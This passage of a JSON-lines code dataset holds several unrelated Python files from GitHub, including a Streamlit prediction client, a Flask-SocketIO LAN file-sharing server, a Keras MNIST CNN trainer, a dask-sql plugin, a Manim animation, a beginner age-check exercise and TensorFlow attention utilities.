Classifier\")\n\n Gender = streamlit.selectbox(\"Gender\", ['Male', 'Female'])\n Education = streamlit.selectbox(\"Education\", ['Graduate', 'Not Graduate'])\n Married = streamlit.selectbox(\"Married\", ['Yes', 'No'])\n Self_Employed = streamlit.selectbox(\"Employment\", ['Yes', 'No'])\n Property_Area = streamlit.selectbox(\"Property Area\", ['Urban', 'Rural', 'Semiurban'])\n\n data = {\n 'Gender': Gender,\n 'Education': Education,\n 'Married': Married,\n 'Self_Employed': Self_Employed,\n 'Property_Area': Property_Area,\n }\n\n if streamlit.button(\"Predict\"):\n response = requests.post(\"http://127.0.0.1:8000/predict\", json=data)\n prediction = response.text\n streamlit.success(f\"The prediction from model: {prediction}\")\n\n\nif __name__ == '__main__':\n # by default it will run at 8501 port\n run()","repo_name":"komalparakh05/The-Vectors","sub_path":"Python_notebooks/.ipynb_checkpoints/API_Streamlit_app.py","file_name":"API_Streamlit_app.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16755733323","text":"from flask import Flask, render_template, request, send_file\nfrom flask_socketio import SocketIO, emit\nfrom flask_cors import CORS\nfrom backgroundend.models import Models\nfrom engineio.async_drivers import eventlet\nimport sys\nimport os\n\n\ndef source_path(relative_path):\n # 是否Bundle Resource\n if getattr(sys, 'frozen', False):\n base_path = sys._MEIPASS\n else:\n base_path = os.path.abspath(\"..\")\n return 
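# --- Added sketch (assumption): the Streamlit record above posts to a local /predict endpoint that
# --- is not included in this dataset; a minimal FastAPI counterpart could look like this, with the
# --- field names copied from the payload above and a placeholder rule standing in for the model.
from fastapi import FastAPI
from pydantic import BaseModel

api = FastAPI()

class LoanRequest(BaseModel):
    Gender: str
    Education: str
    Married: str
    Self_Employed: str
    Property_Area: str

@api.post("/predict")
def predict(req: LoanRequest):
    # hypothetical decision rule, for illustration only
    return "Approved" if req.Education == "Graduate" else "Rejected"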
os.path.join(base_path, relative_path)\n\n\nis_share = True\nmodels = Models()\ntemplate_folder = source_path('dist')\nstatic_folder = source_path('dist\\\\assets')\napp = Flask(__name__, template_folder=template_folder, static_folder=static_folder)\napp.config['SECRET_KEY'] = 'secret!'\nsocketio = SocketIO(app, cors_allowed_origins=\"*\", async_mode='eventlet')\ncors = CORS(app, resources={r\"/*\": {\"origins\": \"*\"}})\n\n\n@app.route('/')\ndef index():  # root route handler\n    return render_template(\"index.html\")\n\n\n@app.route('/download')\ndef download():\n    _id = request.args.get('id', '')\n    dir_info = models.get_file_dir(_id)\n    print(dir_info)\n    return send_file(dir_info[\"dir\"])\n\n\n@socketio.on('notice_web', namespace='/ws_sharing')\ndef select_file_result():\n    if not is_share:\n        result = []\n    else:\n        result = models.get_now_data()\n    emit('select_file_result', {\"data\": result}, namespace=\"/ws_sharing\")\n\n\n@socketio.on('change_share', namespace='/ws_sharing')\ndef change_share_status(val):\n    print(\"change_share_status: \", val)\n    global is_share\n    is_share = val\n    emit(\"change_share\", {'data': is_share}, broadcast=True)\n\n\n# update_file_status\n@socketio.on('update_file_status', namespace='/ws_sharing')\ndef update_file_status(kwarg):\n    print(type(kwarg), kwarg)\n    _id, is_del = kwarg['id'], kwarg['is_del']\n    if is_del:\n        models.thread_wrapper_run(models.del_file_db, {\"_id\": _id})\n    else:\n        models.thread_wrapper_run(models.update_file_status, {\"_id\": _id})\n    # models.update_file_status(_id)\n\n@socketio.on('connect', namespace='/ws_sharing')\ndef test_connect(message):\n    if is_share:\n        reset_data = models.init_front_data()\n    else:\n        reset_data = []\n    print(reset_data)\n    emit('ws_connect', {\"data\": reset_data})\n\n\n@socketio.on('disconnect', namespace='/ws_sharing')\ndef test_disconnect():\n    print('Client disconnected')\n\n\ndef server(is_dev):\n    socketio.run(app, host=\"0.0.0.0\", port=\"5001\")  # start the server\n\n\nif __name__ == '__main__':\n    # socketio.init_app(app, async_mode=\"eventlet\", host=\"0.0.0.0\", port=\"5001\")\n    socketio.run(app, host=\"0.0.0.0\", port=\"5001\")  # start the server\n","repo_name":"mygod123982/lan_sharing","sub_path":"backgroundend/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17792185036","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Oct 15 16:44:05 2019\r\n\r\n@author: AZEST-2019-07\r\n\"\"\"\r\n\r\nimport os \r\nimport time\r\nimport numpy as np\r\nimport tensorflow as tf\r\nfrom tensorflow import keras\r\nfrom tensorflow.keras.models import *\r\nfrom tensorflow.keras.metrics import *\r\nfrom tensorflow.keras.layers import *\r\nfrom tensorflow.keras.layers import GaussianDropout\r\nfrom tensorflow.keras.optimizers import *\r\nfrom tensorflow.keras.callbacks import ModelCheckpoint, LearningRateScheduler, TensorBoard\r\nfrom tensorflow.keras import backend as K\r\nfrom tensorflow.keras.utils import to_categorical\r\nfrom sklearn.metrics import f1_score, confusion_matrix, precision_score, recall_score, jaccard_score\r\nfrom keras.datasets import mnist\r\nfrom tensorflow.keras.callbacks import *\r\nimport sys\r\nsys.path.append('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles')\r\nfrom mnistprep import img_train,label_train,img_test,label_test\r\n\r\nbatch_size = 16\r\nnum_classes = 21\r\nepochs = 1\r\n#data_augmentation = True\r\n#num_predictions = 20\r\n#save_dir = os.path.join(os.getcwd(), 
'saved_models')\r\n#model_name = 'keras_cifar10_trained_model.h5'\r\n\r\ndef load():\r\n x_train, y_train, x_test, y_test = img_train,label_train,img_test,label_test\r\n \r\n y_train = keras.utils.to_categorical(y_train, num_classes)\r\n y_test = keras.utils.to_categorical(y_test, num_classes)\r\n indices = np.random.permutation(np.arange(x_train.shape[0]))\r\n \r\n \r\n x_train = x_train[indices]\r\n y_train = y_train[indices]\r\n \r\n print('x_train shape:', x_train.shape)\r\n print(x_train.shape[0], 'train samples')\r\n print(x_test.shape[0], 'test samples')\r\n return x_train,y_train,x_test,y_test\r\n\r\nx_train,y_train,x_test,y_test = load()\r\n\r\n\r\ndef ioc_loss(y_true,y_pred):\r\n def jaccard_distance(y_true, y_pred, smooth=100):\r\n \"\"\" Calculates mean of Jaccard distance as a loss function \"\"\"\r\n intersection = K.sum(K.abs(y_true * y_pred))\r\n sum_ = K.sum(K.abs(y_true) + K.abs(y_pred))\r\n jac = (intersection + smooth) / (sum_ - intersection + smooth)\r\n jd = (1 - jac) * smooth\r\n return tf.reduce_mean(jd)\r\n return K.mean(-1*y_true*K.log(y_pred+1/(2^20))) + K.log(jaccard_distance(y_true,y_pred)+1/(2^20))\r\n\r\ndef f1(y_true, y_pred):\r\n def recall(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n possible_positives = K.sum(K.round(K.clip(y_true, 0, 1)))\r\n recall = true_positives / (possible_positives + K.epsilon())\r\n return recall\r\n\r\n def precision(y_true, y_pred):\r\n true_positives = K.sum(K.round(K.clip(y_true * y_pred, 0, 1)))\r\n predicted_positives = K.sum(K.round(K.clip(y_pred, 0, 1)))\r\n precision = true_positives / (predicted_positives + K.epsilon())\r\n return precision\r\n precision = precision(y_true, y_pred)\r\n recall = recall(y_true, y_pred)\r\n \r\n return 2*((precision*recall)/(precision+recall+K.epsilon()))\r\n\r\ndef nnBlock(input_shape):\r\n \r\n model = Sequential()\r\n model.add(InputLayer(input_shape=input_shape))\r\n model.add(Conv2D(32, (3, 3), padding='same'))\r\n model.add(Activation('relu'))\r\n model.add(Conv2D(32, (3, 3)))\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n \r\n model.add(Conv2D(64, (3, 3), padding='same'))\r\n model.add(Activation('relu'))\r\n model.add(Conv2D(64, (3, 3)))\r\n model.add(Activation('relu'))\r\n model.add(MaxPooling2D(pool_size=(2, 2)))\r\n model.add(Dropout(0.25))\r\n \r\n model.add(Flatten())\r\n model.add(Dense(168))\r\n model.add(Activation('relu'))\r\n model.add(Dropout(0.25))\r\n model.add(Dense(num_classes))\r\n model.add(Activation('softmax'))\r\n \r\n return model\r\n\r\ndef save_model(model): \r\n json_string = model.to_json()\r\n open('model.json', 'w').write(json_string)\r\n \r\ndef load_model2():\r\n model = load_model('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\mymodel.h5')\r\n model.load_weights('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\best_weights.hdf5')\r\n opt = keras.optimizers.Adam(lr=0.0002, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\r\n model.compile(loss='categorical_crossentropy',\r\n optimizer=opt,\r\n metrics=['accuracy'])\r\n return model\r\n\r\ndef train(x_train,y_train,x_test,y_test):\r\n\r\n tensorboard = TensorBoard(log_dir=\"C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\logs\\\\tb1\")\r\n \r\n x_train = x_train.astype('float32')\r\n x_test = x_test.astype('float32')\r\n x_train /= 255\r\n x_test /= 255\r\n# x_train = np.reshape(x_train,(x_train.shape+(1,)))\r\n# x_test = 
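# --- Added sanity check (illustrative) for the f1 metric defined above:
# --- for y_true = [1, 1, 0, 0] and y_pred = [1, 0, 1, 0],
# ---     true_positives = 1, possible_positives = 2, predicted_positives = 2,
# --- so precision = recall = 0.5 and f1 = 2 * (0.5 * 0.5) / (0.5 + 0.5) = 0.5
# --- (up to the K.epsilon() smoothing terms).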
np.reshape(x_test,(x_test.shape+(1,)))\r\n    \r\n    print(' test... \\n')\r\n    print(x_train.shape,x_test.shape,y_train.shape,y_test.shape)\r\n    \r\n    model = nnBlock((28,28,1))\r\n    model.load_weights('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\best_weights2.hdf5')\r\n    print(model.summary())\r\n    \r\n    opt = keras.optimizers.Adam(lr=0.0002, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False)\r\n    \r\n    model.compile(loss='categorical_crossentropy',\r\n                  optimizer=opt,\r\n                  metrics=['accuracy'])\r\n    \r\n    checkpointer = ModelCheckpoint(filepath=\"C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\best_weights.hdf5\", \r\n                                   monitor = 'val_accuracy',\r\n                                   verbose=1, \r\n                                   save_best_only=True)\r\n    \r\n    history = model.fit(x_train, y_train,batch_size=batch_size,\r\n                        epochs=epochs,\r\n                        validation_data=(x_test, y_test),\r\n                        shuffle=True,callbacks=[tensorboard,checkpointer])\r\n    save_model(model)\r\n    model.save_weights('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\best_weights.hdf5')\r\n    model.save('C:\\\\Users\\\\AZEST-2019-07\\\\Desktop\\\\pyfiles\\\\mymodel.h5')\r\n\r\ntrain(x_train,y_train,x_test,y_test)\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"barathksd/Thyroid-Segmentation","sub_path":"cnndemo.py","file_name":"cnndemo.py","file_ext":"py","file_size_in_byte":5971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32181562535","text":"from typing import TYPE_CHECKING, Any, Union\n\nimport dask.dataframe as dd\n\nfrom dask_sql.datacontainer import DataContainer\nfrom dask_sql.physical.rex import RexConverter\nfrom dask_sql.physical.rex.base import BaseRexPlugin\n\nif TYPE_CHECKING:\n    import dask_sql\n    from dask_sql._datafusion_lib import Expression, LogicalPlan\n\n\nclass RexAliasPlugin(BaseRexPlugin):\n    \"\"\"\n    A RexAliasPlugin is an expression, which references a Subquery.\n    This plugin is thin on logic, however keeping with previous patterns\n    we use the plugin approach instead of placing the logic inline\n    \"\"\"\n\n    class_name = \"RexAlias\"\n\n    def convert(\n        self,\n        rel: \"LogicalPlan\",\n        rex: \"Expression\",\n        dc: DataContainer,\n        context: \"dask_sql.Context\",\n    ) -> Union[dd.Series, Any]:\n        # extract the operands; there should only be a single underlying Expression\n        operands = rex.getOperands()\n        assert len(operands) == 1\n\n        sub_rex = operands[0]\n\n        value = RexConverter.convert(rel, sub_rex, dc, context=context)\n\n        if isinstance(value, DataContainer):\n            return value.df\n\n        return value\n","repo_name":"dask-contrib/dask-sql","sub_path":"dask_sql/physical/rex/core/alias.py","file_name":"alias.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":336,"dataset":"github-code","pt":"21"} +{"seq_id":"34158836278","text":"from manim import *\n\nclass ImageAnimation(Scene):\n    def construct(self):\n        # Load a PNG image\n        image = ImageMobject(\"mapa_de_calor.png\") \n\n        \n        image.scale(1.5)\n\n        \n        image.move_to(ORIGIN)\n\n        \n        self.play(FadeIn(image))\n\n\n        self.wait(10)\n\n        self.play(FadeOut(image))\n","repo_name":"MartinPaGarcia/Developer_Personal_Projects","sub_path":"Python/Manim/animacion_mapa.py","file_name":"animacion_mapa.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"20346778416","text":"# Internet cafe age check\n# read the user's age\n# age = int(input(\"Please enter your age: \" ))\n# # check whether the user is at least 18 (>=)\n# if age >= 18:\n#     # if 18 or older, allow them into the internet cafe\n#     print(\"You may enter the internet cafe \")\n# # if under 18, tell them to go home and do homework\n# else:\n#     print(\"Go home and do your homework!\")\n\n\n# Exercise 2: if with logical operators\n# define an integer variable age and write code to check whether it is valid\nage = int(input(\"Enter your age\"))\n# a person's age must be between 0 and 120\n\"\"\"\nWork it out step by step:\nstart from a test number like 1000\npick the logical operator\nage >= 0 or age <=120\nage >=0 and age <=120\n\"\"\"\nif age >=0 and age <=120:\n    print(\"Age is valid\")\nelse:\n    print(\"Age is invalid\")\n\n","repo_name":"lianghanwu1999/Python","sub_path":"python基础部分/python顺序输入训练/if语句_年龄判断练习.py","file_name":"if语句_年龄判断练习.py","file_ext":"py","file_size_in_byte":706,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"74901545973","text":"import tensorflow as tf\nfrom tensorflow.python.ops import nn_ops\n\ndef my_lstm_layer(input_reps, lstm_dim, scope_name=None, reuse=False, is_training=True, dropout_rate=0.2):\n    '''\n    :param inputs: [batch_size, seq_len, feature_dim]\n    :param lstm_dim:\n    :param scope_name:\n    :param reuse:\n    :param is_training:\n    :param dropout_rate:\n    :return:\n    '''\n    with tf.variable_scope(scope_name, reuse=reuse):\n        inputs = tf.transpose(input_reps, [1, 0, 2])\n        inputs = dropout_layer(inputs, dropout_rate, is_training=is_training)\n        lstm = tf.contrib.cudnn_rnn.CudnnLSTM(1, lstm_dim, direction=\"bidirectional\",\n                                              name=\"{}_cudnn_bi_lstm\".format(scope_name), dropout=0)\n        # name=\"{}_cudnn_bi_lstm\".format(scope_name), dropout=dropout_rate if is_training else 0)\n        outputs, _ = lstm(inputs)\n        outputs = tf.transpose(outputs, [1, 0, 2])\n        f_rep = outputs[:, :, 0:lstm_dim]\n        b_rep = outputs[:, :, lstm_dim:2*lstm_dim]\n        return (f_rep,b_rep, outputs)\n\ndef dropout_layer(input_reps, dropout_rate, is_training=True):\n    if is_training:\n        output_repr = tf.nn.dropout(input_reps, (1 - dropout_rate))\n    else:\n        output_repr = input_reps\n    return output_repr\n\ndef cosine_distance(y1,y2, cosine_norm=True, eps=1e-6):\n    # cosine_norm = True\n    # y1 [....,a, 1, d]\n    # y2 [....,1, b, d]\n    cosine_numerator = tf.reduce_sum(tf.multiply(y1, y2), axis=-1)\n    if not cosine_norm:\n        return tf.tanh(cosine_numerator)\n    y1_norm = tf.sqrt(tf.maximum(tf.reduce_sum(tf.square(y1), axis=-1), eps))\n    y2_norm = tf.sqrt(tf.maximum(tf.reduce_sum(tf.square(y2), axis=-1), eps))\n    return cosine_numerator / y1_norm / y2_norm\n\ndef euclidean_distance(y1, y2, eps=1e-6):\n    distance = tf.sqrt(tf.maximum(tf.reduce_sum(tf.square(y1 - y2), axis=-1), eps))\n    return distance\n\ndef softmax_with_mask(values, mask):\n    # e_x = np.exp(x - np.max(x))\n    # return e_x / e_x.sum()\n    e_x = tf.exp(values - tf.expand_dims(tf.reduce_max(values, axis=-1), axis=-1))\n    # e_x *= tf.expand_dims(mask, axis=-1)\n    e_x += 1e-6\n    e_x *= mask\n    return e_x / (tf.expand_dims(tf.reduce_sum(e_x, axis=-1), axis=-1) + 1e-6)\n\ndef cross_entropy(logits, truth, mask=None):\n    # logits: [batch_size, passage_len]\n    # truth: [batch_size, passage_len]\n    # mask: [batch_size, passage_len]\n    if mask is not None: logits = tf.multiply(logits, mask)\n    xdev = tf.subtract(logits, tf.expand_dims(tf.reduce_max(logits, 1), -1))\n    log_predictions = tf.subtract(xdev, tf.expand_dims(tf.log(tf.reduce_sum(tf.exp(xdev),-1)),-1))\n    result = tf.multiply(truth, log_predictions) # [batch_size, passage_len]\n    if mask is not None: result = tf.multiply(result, mask) # [batch_size, passage_len]\n    return tf.multiply(-1.0,tf.reduce_sum(result, -1)) # [batch_size]\n\ndef projection_layer(in_val, input_size, output_size, activation_func=tf.tanh, scope=None):\n    # in_val: [batch_size, passage_len, dim]\n    input_shape = tf.shape(in_val)\n    batch_size = input_shape[0]\n    passage_len = input_shape[1]\n#    feat_dim = input_shape[2]\n    in_val = 
tf.reshape(in_val, [batch_size * passage_len, input_size])\n with tf.variable_scope(scope or \"projection_layer\"):\n full_w = tf.get_variable(\"full_w\", [input_size, output_size], dtype=tf.float32)\n full_b = tf.get_variable(\"full_b\", [output_size], dtype=tf.float32)\n outputs = activation_func(tf.nn.xw_plus_b(in_val, full_w, full_b))\n outputs = tf.reshape(outputs, [batch_size, passage_len, output_size])\n return outputs # [batch_size, passage_len, output_size]\n\ndef highway_layer(in_val, output_size, activation_func=tf.tanh, scope=None):\n # in_val: [batch_size, passage_len, dim]\n input_shape = tf.shape(in_val)\n batch_size = input_shape[0]\n passage_len = input_shape[1]\n# feat_dim = input_shape[2]\n in_val = tf.reshape(in_val, [batch_size * passage_len, output_size])\n with tf.variable_scope(scope or \"highway_layer\"):\n highway_w = tf.get_variable(\"highway_w\", [output_size, output_size], dtype=tf.float32)\n highway_b = tf.get_variable(\"highway_b\", [output_size], dtype=tf.float32)\n full_w = tf.get_variable(\"full_w\", [output_size, output_size], dtype=tf.float32)\n full_b = tf.get_variable(\"full_b\", [output_size], dtype=tf.float32)\n trans = activation_func(tf.nn.xw_plus_b(in_val, full_w, full_b))\n gate = tf.nn.sigmoid(tf.nn.xw_plus_b(in_val, highway_w, highway_b))\n outputs = tf.add(tf.multiply(trans, gate), tf.multiply(in_val, tf.subtract(1.0, gate)), \"y\")\n outputs = tf.reshape(outputs, [batch_size, passage_len, output_size])\n return outputs\n\ndef multi_highway_layer(in_val, output_size, num_layers, activation_func=tf.tanh, scope_name=None, reuse=False):\n with tf.variable_scope(scope_name, reuse=reuse):\n for i in xrange(num_layers):\n cur_scope_name = scope_name + \"-{}\".format(i)\n in_val = highway_layer(in_val, output_size,activation_func=activation_func, scope=cur_scope_name)\n return in_val\n\ndef collect_representation2(representation, positions):\n '''\n :param representation: [batch_size, passsage_length, dim]\n :param positions: [batch_size, num_positions]\n :return:\n '''\n def singel_instance(x):\n # x[0]: [passage_length, dim]\n # x[1]: [num_positions]\n return tf.gather(x[0], x[1])\n elems = (representation, positions)\n return tf.map_fn(singel_instance, elems, dtype=tf.float32) # [batch_size, num_positions, dim]\n\ndef collect_representation(representation, positions):\n # representation: [batch_size, node_num, feature_dim]\n # positions: [batch_size, neigh_num]\n return collect_probs(representation, positions)\n\n\ndef collect_final_step_of_lstm(lstm_representation, lengths):\n # lstm_representation: [batch_size, passsage_length, dim]\n # lengths: [batch_size]\n lengths = tf.maximum(lengths, tf.zeros_like(lengths, dtype=tf.int32))\n\n batch_size = tf.shape(lengths)[0]\n batch_nums = tf.range(0, limit=batch_size) # shape (batch_size)\n indices = tf.stack((batch_nums, lengths), axis=1) # shape (batch_size, 2)\n result = tf.gather_nd(lstm_representation, indices, name='last-forwar-lstm')\n return result # [batch_size, dim]\n\ndef collect_probs(probs, positions):\n # probs [batch_size, chunks_size]\n # positions [batch_size, pair_size]\n batch_size = tf.shape(probs)[0]\n pair_size = tf.shape(positions)[1]\n batch_nums = tf.range(0, limit=batch_size) # shape (batch_size)\n batch_nums = tf.reshape(batch_nums, shape=[-1, 1]) # [batch_size, 1]\n batch_nums = tf.tile(batch_nums, multiples=[1, pair_size]) # [batch_size, pair_size]\n\n indices = tf.stack((batch_nums, positions), axis=2) # shape (batch_size, pair_size, 2)\n pair_probs = tf.gather_nd(probs, 
indices)\n # pair_probs = tf.reshape(pair_probs, shape=[batch_size, pair_size])\n return pair_probs\n\ndef calcuate_attention(in_value_1, in_value_2, feature_dim1, feature_dim2, scope_name='att',\n att_type='symmetric', att_dim=20, remove_diagnoal=False, mask1=None, mask2=None,\n is_training=False, dropout_rate=0.2, cosine_attention_scale=200):\n input_shape = tf.shape(in_value_1)\n batch_size = input_shape[0]\n len_1 = input_shape[1]\n len_2 = tf.shape(in_value_2)[1]\n\n in_value_1 = dropout_layer(in_value_1, dropout_rate, is_training=is_training)\n in_value_2 = dropout_layer(in_value_2, dropout_rate, is_training=is_training)\n with tf.variable_scope(scope_name):\n if att_type != 'cosine' and att_type != 'dot':\n # calculate attention ==> a: [batch_size, len_1, len_2]\n atten_w1 = tf.get_variable(\"atten_w1\", [feature_dim1, att_dim], dtype=tf.float32)\n atten_value_1 = tf.matmul(tf.reshape(in_value_1, [batch_size * len_1, feature_dim1]), atten_w1) # [batch_size*len_1, feature_dim]\n\n if feature_dim1 == feature_dim2: atten_w2 = atten_w1\n else: atten_w2 = tf.get_variable(\"atten_w2\", [feature_dim2, att_dim], dtype=tf.float32)\n # atten_w2 = tf.get_variable(\"atten_w2\", [feature_dim2, att_dim], dtype=tf.float32)\n atten_value_2 = tf.matmul(tf.reshape(in_value_2, [batch_size * len_2, feature_dim2]), atten_w2) # [batch_size*len_2, feature_dim]\n\n if att_type == 'additive':\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n\n atten_b = tf.get_variable(\"atten_b\", [att_dim], dtype=tf.float32)\n atten_v = tf.get_variable(\"atten_v\", [1, att_dim], dtype=tf.float32)\n atten_value_1 = tf.expand_dims(atten_value_1, axis=2, name=\"atten_value_1\") # [batch_size, len_1, 'x', feature_dim]\n atten_value_2 = tf.expand_dims(atten_value_2, axis=1, name=\"atten_value_2\") # [batch_size, 'x', len_2, feature_dim]\n atten_value = atten_value_1 + atten_value_2 # + tf.expand_dims(tf.expand_dims(tf.expand_dims(atten_b, axis=0), axis=0), axis=0)\n atten_value = nn_ops.bias_add(atten_value, atten_b)\n atten_value = tf.tanh(atten_value) # [batch_size, len_1, len_2, feature_dim]\n atten_value = tf.reshape(atten_value, [-1, att_dim]) * atten_v # tf.expand_dims(atten_v, axis=0) # [batch_size*len_1*len_2, feature_dim]\n atten_value = tf.reduce_sum(atten_value, axis=-1)\n atten_value = tf.reshape(atten_value, [batch_size, len_1, len_2])\n elif att_type == 'symmetric':\n atten_value_1 = tf.nn.relu(atten_value_1) # [batch_size*len1, att_dim]\n atten_value_2 = tf.nn.relu(atten_value_2) # [batch_size*len2, att_dim]\n D_in = tf.get_variable(\"diagonal_{}\".format(scope_name), [att_dim], dtype=tf.float32) # att_dim\n D = D_in * tf.diag(tf.ones([att_dim], tf.float32), name='diagonal') # att_dim xatt_dim\n atten_value_1 = tf.matmul(atten_value_1, D) # [batch_size*len1, att_dim]\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n atten_value = tf.matmul(atten_value_1, atten_value_2, transpose_b=True) # [batch_size, len_1, len_2]\n elif att_type == 'cosine':\n atten_value = cal_relevancy_matrix(in_value_2, in_value_1)\n atten_value = atten_value * cosine_attention_scale\n elif att_type == 'dot':\n atten_value = tf.matmul(in_value_1, in_value_2, transpose_b=True)\n else:\n atten_value_1 = tf.tanh(atten_value_1)\n # atten_value_1 = tf.nn.relu(atten_value_1)\n atten_value_2 = tf.tanh(atten_value_2)\n # atten_value_2 = 
tf.nn.relu(atten_value_2)\n diagnoal_params = tf.get_variable(\"diagonal_params\", [att_dim], dtype=tf.float32)\n atten_value_1 = atten_value_1 * tf.expand_dims(diagnoal_params, axis=0)\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n atten_value = tf.matmul(atten_value_1, atten_value_2, transpose_b=True) # [batch_size, len_1, len_2]\n\n if remove_diagnoal:\n diagnoal = tf.ones([len_1], tf.float32) # [len1]\n diagnoal = 1.0 - tf.diag(diagnoal) # [len1, len1]\n diagnoal = tf.expand_dims(diagnoal, axis=0) # ['x', len1, len1]\n atten_value = atten_value * diagnoal\n if mask1 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask1, axis=-1))\n if mask2 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask2, axis=1))\n # normalize\n # atten_value = tf.nn.softmax(atten_value, name='atten_value') # [batch_size, len_1, len_2]\n atten_value = softmax_with_mask(atten_value, tf.expand_dims(mask2, axis=1))\n if remove_diagnoal: atten_value = atten_value * diagnoal\n if mask1 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask1, axis=-1))\n if mask2 is not None: atten_value = tf.multiply(atten_value, tf.expand_dims(mask2, axis=1))\n\n return atten_value\n\n\ndef calcuate_attention_bak(in_value_1, in_value_2, feature_dim1, feature_dim2, scope_name='att',\n att_type='symmetric', att_dim=20, remove_diagnoal=False, mask1=None, mask2=None, is_training=False, dropout_rate=0.2,\n cosine_attention_scale=200):\n input_shape = tf.shape(in_value_1)\n batch_size = input_shape[0]\n len_1 = input_shape[1]\n len_2 = tf.shape(in_value_2)[1]\n\n in_value_1 = dropout_layer(in_value_1, dropout_rate, is_training=is_training)\n in_value_2 = dropout_layer(in_value_2, dropout_rate, is_training=is_training)\n with tf.variable_scope(scope_name):\n # if att_type != 'cosine':\n # calculate attention ==> a: [batch_size, len_1, len_2]\n atten_w1 = tf.get_variable(\"atten_w1\", [feature_dim1, att_dim], dtype=tf.float32)\n atten_value_1 = tf.matmul(tf.reshape(in_value_1, [batch_size * len_1, feature_dim1]), atten_w1) # [batch_size*len_1, feature_dim]\n\n if feature_dim1 == feature_dim2: atten_w2 = atten_w1\n else: atten_w2 = tf.get_variable(\"atten_w2\", [feature_dim2, att_dim], dtype=tf.float32)\n # atten_w2 = tf.get_variable(\"atten_w2\", [feature_dim2, att_dim], dtype=tf.float32)\n atten_value_2 = tf.matmul(tf.reshape(in_value_2, [batch_size * len_2, feature_dim2]), atten_w2) # [batch_size*len_2, feature_dim]\n\n if att_type == 'additive':\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n\n atten_b = tf.get_variable(\"atten_b\", [att_dim], dtype=tf.float32)\n atten_v = tf.get_variable(\"atten_v\", [1, att_dim], dtype=tf.float32)\n atten_value_1 = tf.expand_dims(atten_value_1, axis=2, name=\"atten_value_1\") # [batch_size, len_1, 'x', feature_dim]\n atten_value_2 = tf.expand_dims(atten_value_2, axis=1, name=\"atten_value_2\") # [batch_size, 'x', len_2, feature_dim]\n atten_value = atten_value_1 + atten_value_2 # + tf.expand_dims(tf.expand_dims(tf.expand_dims(atten_b, axis=0), axis=0), axis=0)\n atten_value = nn_ops.bias_add(atten_value, atten_b)\n atten_value = tf.tanh(atten_value) # [batch_size, len_1, len_2, feature_dim]\n atten_value = tf.reshape(atten_value, [-1, att_dim]) * atten_v # tf.expand_dims(atten_v, axis=0) # [batch_size*len_1*len_2, feature_dim]\n atten_value = 
tf.reduce_sum(atten_value, axis=-1)\n atten_value = tf.reshape(atten_value, [batch_size, len_1, len_2])\n elif att_type == 'symmetric':\n atten_value_1 = tf.nn.relu(atten_value_1) # [batch_size*len1, att_dim]\n atten_value_2 = tf.nn.relu(atten_value_2) # [batch_size*len2, att_dim]\n D_in = tf.get_variable(\"diagonal_{}\".format(scope_name), [att_dim], dtype=tf.float32) # att_dim\n D = D_in * tf.diag(tf.ones([att_dim], tf.float32), name='diagonal') # att_dim xatt_dim\n atten_value_1 = tf.matmul(atten_value_1, D) # [batch_size*len1, att_dim]\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n atten_value = tf.matmul(atten_value_1, atten_value_2, transpose_b=True) # [batch_size, len_1, len_2]\n elif att_type == 'cosine':\n atten_value_1 = tf.nn.relu(atten_value_1) # [batch_size*len1, att_dim]\n atten_value_2 = tf.nn.relu(atten_value_2) # [batch_size*len2, att_dim]\n atten_value_1 = tf.reshape(atten_value_1, [batch_size, len_1, att_dim])\n atten_value_2 = tf.reshape(atten_value_2, [batch_size, len_2, att_dim])\n atten_value = cal_relevancy_matrix(atten_value_2, atten_value_1)\n atten_value = atten_value * cosine_attention_scale\n else:\n atten_value_1 = tf.tanh(atten_value_1)\n # atten_value_1 = tf.nn.relu(atten_value_1)\n atten_value_2 = tf.tanh(atten_value_2)\n # atten_value_2 = tf.nn.relu(atten_value_2)\n diagnoal_params = 